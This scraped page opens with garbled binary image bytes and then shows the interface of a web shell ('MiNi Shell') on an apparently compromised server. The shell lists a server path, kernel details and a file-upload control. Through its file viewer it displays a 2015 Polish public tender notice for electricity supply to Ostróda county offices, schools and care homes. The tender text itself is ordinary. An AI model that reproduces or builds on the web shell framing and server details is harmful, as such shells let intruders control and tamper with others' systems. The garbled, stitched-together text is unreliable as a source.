JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150914/135505-N-2015.html

<p class="kh_header"><b>Ostróda: Dostawa energii elektrycznej dla potrzeb Powiatu Ostródzkiego, jednostek organizacyjnych Powiatu Ostródzkiego oraz innych podmiotów</b><br>
<b>Numer ogłoszenia: 135505 - 2015; data zamieszczenia: 14.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ostródzki z siedzibą w Ostródzie , ul. Jana III Sobieskiego 5, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 089 6429800, faks 089 6429817.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.ostroda.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa energii elektrycznej dla potrzeb Powiatu Ostródzkiego, jednostek organizacyjnych Powiatu Ostródzkiego oraz innych podmiotów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa energii elektrycznej dla potrzeb Powiatu Ostródzkiego, jednostek organizacyjnych Powiatu Ostródzkiego oraz innych podmiotów, zgodnie z przepisami ustawy z dnia 10 kwietnia 1997r. Prawo energetyczne (Dz.U. z 2012r. poz. 1059, z późn. zm.),  szczegółowym opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do siwz, formularzem cenowym stanowiącym załącznik nr 3 do siwz oraz projektem umowy - stanowiącym załącznik nr 4 do siwz.
Szacowane zużycie energii elektrycznej na cele obiektów wyszczególnionych w załączniku nr 1                do siwz, w okresie od dnia 01.01.2016r. do dnia 31.12.2016r., określa się na                             2.157.780 kWh, w tym: w taryfach C11, C21, G11, C12A i G12W (strefa całodobowa) - 1.425.886 kWh; w taryfie C23: strefa I -  196.438 kWh; strefa II - 89.600 kWh; strefa III - 454.856 kWh.
2. Wykaz podmiotów, na rzecz których ma być realizowana dostawa energii: 
2.1. Zamawiający i jego jednostki organizacyjne:
1) Powiat Ostródzki z siedzibą w Ostródzie przy ul. Jana III Sobieskiego 5,                                    14 - 100 Ostróda;
2) Zespół Szkół Rolniczych im. Wincentego Witosa w Ostródzie, ul. Czarnieckiego 69,                          14-100 Ostróda; 
3) Zespół Szkół Zawodowych im. Sandora Petöfi w Ostródzie, ul. Sportowa 1,                          14-100 Ostróda;
4) Zespół Szkół Zawodowych im. Stanisława Staszica i Centrum Kształcenia Ustawicznego,                   ul. Kardynała Stefana Wyszyńskiego 2, 14-100 Ostróda; 
5) Zespół Szkół Zawodowych i Ogólnokształcących im. 9 Drezdeńskiej Brygady Artylerii                    w Morągu, ul. Kujawska 1, 14 - 300 Morąg;
6) Zespól Szkół Licealnych w Morągu, ul. 11 Listopada 7, 14 - 300 Morąg;
7) Liceum Ogólnokształcące Nr 1 im. Jana Bażyńskiego, ul. Drwęcka 2, 14-100 Ostróda;
8) Zespół Placówek Szkolno - Wychowawczo - Rewalidacyjnych w Ostródzie,                          ul. Grunwaldzka 14, 14-100 Ostróda;
9) Specjalny Ośrodek Szkolno - Wychowawczy w Szymanowie, Szymanowo 2,                             14 - 300 Morąg;
10) Specjalny Ośrodek Szkolno-Wychowawczy, ul. Olsztyńska 9A, 14-310 Miłakowo;
11) Zarząd Dróg Powiatowych w Ostródzie, ul. Grunwaldzka 62A, 14-100 Ostróda;
12) Komenda Powiatowa Państwowej Straży Pożarnej w Ostródzie, ul. Stapińskiego 19c,                                        14-100 Ostróda;
13) Zespół Placówek Pedagogicznych, ul. Sportowa 1, 14-100 Ostróda;
14) Powiatowy Urząd Pracy w Ostródzie, ul. Jana III Sobieskiego 5, 14-100 Ostróda                         (dot. Filii w Morągu, ul. Gen. Dąbrowskiego 8, 14 -300 Morąg).
2.2. Podmioty, w imieniu i na rzecz których Zamawiający prowadzi postępowanie                               o udzielenie niniejszego zamówienia na podstawie art. 16 ust. 1 ustawy Pzp:
1) Powiatowy Zespół Opieki Zdrowotnej w Ostródzie S.A., ul. Wł. Jagiełły 1,                                 14-100 Ostróda;
2) Morąskie Stowarzyszenie Wspierania Rodzin, ul. Żeromskiego 19, 14 - 300 Morąg (Placówka Wielofunkcyjna Dom Dla Dzieci i Młodzieży Promyk)
3) Fundacja Polskich Kawalerów Maltańskich w Warszawie - Pomoc Maltańska - Oddział                w Szyldaku, ul. Gdańska 14, 14 - 106 Szyldak (Dom Pomocy Społecznej Michała Archanioła w Szyldaku);
4) Dom Dla Dzieci im. Sybiraków w Szymonowie 14, 14-330 Małdyty.
3. Przedmiot zamówienia w szczególności obejmuje:
1) Dostawę energii elektrycznej do obiektów Zamawiającego wymienionych w zał. nr 1                       do siwz, zgodnie z warunkami określonymi w projekcie umowy (zał. nr 4 do siwz).
2) Zapewnienie Zamawiającemu dostępu do informacji o danych pomiarowo-rozliczeniowych energii elektrycznej pobranej przez Zamawiającego w poszczególnych punktach poboru.
3) Bilansowanie handlowe w zakresie sprzedaży energii elektrycznej.
4) Zgłoszenie Operatorowi Systemu Dystrybucyjnego do realizacji zawartej                                  z Zamawiającym umowy sprzedaży energii elektrycznej w terminie gwarantującym rozpoczęcie sprzedaży energii przez Wykonawcę w terminie określonym w § 4 siwz, w tym przeprowadzenie procesu skutecznej zmiany sprzedawcy energii elektrycznej z właściwym Operatorem Systemu Dystrybucyjnego (dalej OSD) na podstawie udzielonego przez Zamawiającego pełnomocnictwa.
5) Świadczenia niezbędnej pomocy przy zawieraniu oraz realizacji umów o świadczenie usług dystrybucyjnych, w tym w przypadku  ewentualnych zmian taryf oraz mocy umownych                          dla poszczególnych obiektów, w szczególności w zakresie ustalania treści stosownych pism                       i przedkładania ich do podpisu Zamawiającemu oraz uzyskania od OSD niezbędnych dokumentów.
4. Inne postanowienia: 
1) Umowy w sprawie zamówienia publicznego zostaną zawarte odrębnie z każdym podmiotem wymienionym w § 3 siwz ust. 3 pkt 3.1 i 3.2, odpowiednio dla punktów poboru energii określonych w szczegółowym opisie przedmiotu zamówienia (zał. nr 1 do siwz).
2) Przedmiot zamówienia nie obejmuje świadczenia usług dystrybucji energii elektrycznej.
3) Zamawiający posiada zawarte odrębne umowy na dostawę (sprzedaż) i dystrybucję energii elektrycznej dla wszystkich punktów wskazanych w zał. nr 1 do siwz, z zastrzeżeniem pkt 6. 
4) Umowy na dystrybucję zawarte są na czas nieokreślony i wymagają zgłoszenia do OSD zmiany sprzedawcy, z zastrzeżeniem pkt 6.
5) Umowy na dostawę (sprzedaż) energii elektrycznej zawarte są na czas określony do dnia                    31 grudnia 2015r. i nie wymagają wypowiedzenia, z zastrzeżeniem pkt 6. 
6) Powiatowy Urząd Pracy w Ostródzie, w dniu 3 września 2015r. dokonał wypowiedzenia umowy kompleksowej zawartej dla Filii w Morągu (poz. 57 załącznika nr 1 do siwz). Umowa kompleksowa obowiązuje do dnia 31 grudnia 2015r. z 3 miesięcznym okresem wypowiedzenia.
7) Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent                          czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ 
i dopuszcza składanie ofert równoważnych o parametrach techniczno /eksploatacyjno /użytkowych nie gorszych niż te, podane w opisie przedmiotu zamówienia. Podstawa prawna:                art. 29 ust. 3 Ustawy Prawo Zamówień Publicznych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przewiduje się możliwość udzielania zamówień uzupełniających stanowiących nie więcej                    niż 20 % wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy, zgodnie                   z art. 67 ust. 1 pkt 7 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych                              (Dz.U. z 2013r. poz. 907, z późń. zm.)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.00.00.00-3, 09.30.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości  10.000,00 PLN (słownie: dziesięć tysięcy złotych).
Wadium należy wnieść w terminie do dnia 2015-09-28 do godz. 10:00 w formie dopuszczonej uPzp (art. 45 ust. 6):
w formie pieniądza: przelewem na konto: 
-PKO BP  O/Gdańsk nr konta   93 1020 1811 0000 0602 0271 6835.
Wadium musi się znajdować fizycznie na koncie Zamawiającego najdalej w dniu 2015-09-28
o godz. 10:00.
- w innych formach dopuszczonych ustawą (poręczenia bankowe lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej; gwarancje bankowe; gwarancje ubezpieczeniowe; poręczenia, o których mowa w art. 45 ust. 6 pkt 5 uPzp) należy złożyć w pokoju nr 418                       (III piętro - Biuro Zamówień Publicznych).
W/w poręczenia i gwarancje muszą być wystawione na Zamawiającego, tj. Powiat Ostródzki                   z siedzibą w Ostródzie 14 - 100 Ostróda, ul. Jana III Sobieskiego 5, muszą być bezwarunkowe               i płatne na pierwsze żądanie Zamawiającego zgodnie z przesłankami utraty wadium określonymi                                w art. 46 ust. 4a i ust. 5 uPzp</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać aktualną koncesję na prowadzenie działalności gospodarczej                         w zakresie obrotu energią elektryczną, wydaną przez Prezesa Urzędu Regulacji Energetyki.
Spełnianie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności zostanie ocenione na zasadzie spełnia/nie spełnia, na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 1 ustawy Pzp, o którym mowa w § 6 ust. 1 siwz (zał. nr 3A do siwz) oraz dokumentu, o którym mowa w § 6 ust. 1 pkt 1 siwz. Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 ustawy Pzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu w zakresie posiadania wiedzy i doświadczenia jest wykazanie, że Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej trzy dostawy polegające na nieprzerwanej dostawie energii elektrycznej przez okres minimum 12 miesięcy, każda o  wolumenie minimum 1,5 GWh.  

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie                          od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Treść dokumentu lub dokumentów mających potwierdzić fakt oddania                           do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia powinna bezspornie                i jednoznacznie wskazywać na:
- zakres dostępnych wykonawcy zasobów podmiotu trzeciego,
- sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
- charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
- zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 

Spełnianie warunku posiadania wiedzy i doświadczenia zostanie ocenione na zasadzie spełnia/                 nie spełnia, na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 2 ustawy Pzp, o którym mowa w § 6 siwz ust. 1 (zał. nr 3A do siwz) oraz dokumentów, o których mowa w § 6 ust. 1 pkt 2. Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania                   na podstawie art. 24 ust. 2 pkt 4 ustawy Pzp i uznanie jego oferty za odrzuconą zgodnie z art. 24 ust. 4 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustalił szczegółowych warunków dotyczących dysponowania potencjałem technicznym.
Spełnianie powyższego warunku zostanie ocenione na zasadzie spełnia/nie spełnia,                           na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 3 ustawy Pzp, o którym mowa w § 6                     ust. 1 siwz (zał. nr 3A do siwz). Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty                     za odrzuconą zgodnie z art. 24 ust. 4 uPzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustalił szczegółowych warunków dotyczących dysponowania osobami zdolnymi do wykonania zamówienia.

Spełnianie powyższego warunku zostanie ocenione na zasadzie spełnia/nie spełnia,                           na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 3 ustawy Pzp, o którym mowa w § 6                     ust. 1 siwz (zał. nr 3A do siwz). Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty                            za odrzuconą zgodnie z art. 24 ust. 4 uPzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustalił szczegółowych warunków dotyczących sytuacji ekonomicznej                              i finansowej.
Spełnianie powyższego warunku zostanie ocenione na zasadzie spełnia/nie spełnia,                              na podstawie oświadczenia w trybie art. 22 ust. 1 pkt 4 ustawy Pzp, o którym mowa w § 6       ust. 1 siwz (zał. nr  3A do siwz). Niewykazanie spełniania warunku jw. spowoduje wykluczenie wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt 4 uPzp i uznanie jego oferty                     za odrzuconą zgodnie z art. 24 ust. 4 uPzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania w wykazie, o którym mowa w § 6 ust 1 pkt 2 siwz, głównych dostaw wykonywanych przez Wykonawcę, dotyczy dostaw zrealizowanych lub realizowanych w zakresie wymaganym w § 5 ust. 2 siwz.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany formularz ofertowy (zał. nr 2 do siwz).
2) Wypełniony i podpisany formularz kalkulacji ceny ofertowej (zał. nr 2A do siwz).
3) W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. Wzór pełnomocnictwa stanowi załącznik nr 6 do siwz.
4) W przypadku ustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania i złożenia oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wynagrodzenie przysługujące Wykonawcy, wynikające ze złożonej oferty, może ulec zmianie w przypadku ustawowej zmiany stawki podatku akcyzowego i/lub podatku od towarów i usług VAT. Zmiana ceny ofertowej z uwagi na ustawową zmianę stawki podatku akcyzowego i/lub podatku od towarów i usług VAT nie wymaga aneksu do umowy.
2. Ilość faktycznie zakupionej energii może różnić się od zadeklarowanej przez Zamawiającego w zał. nr 1 do umowy (przeniesiony do umowy zał. nr 1 do siwz w zakresie adekwatnym                          dla danego podmiotu) i zależeć będzie od rzeczywistego zapotrzebowania Zamawiającego, na co Wykonawca wyraża zgodę i nie będzie dochodził żadnych roszczeń prawnych i finansowych z tytułu zmian ilościowych dostarczonej energii w trakcie realizacji umowy.
3. Zamawiającemu przysługuje prawo ograniczenia ilości punktów poboru energii wyszczególnionych w zał. nr 1 do umowy (przeniesiony do umowy zał. nr 1 do siwz                           w zakresie adekwatnym dla danego podmiotu), w przypadku przekazania, sprzedaży, wynajmu obiektu (punktu poboru energii) innemu właścicielowi oraz w przypadku zamknięcia lub likwidacji obiektu (punktu poboru energii), na co Wykonawca wyraża zgodę i nie będzie dochodził żadnych roszczeń prawnych i finansowych z tytułu zmian ilościowych dostarczonej energii w trakcie realizacji umowy. Ograniczenie ilości punktów poboru energii elektrycznej może nastąpić na podstawie pisemnego oświadczenia Zamawiającego i nie wymaga aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiat.ostroda.pl.<br>
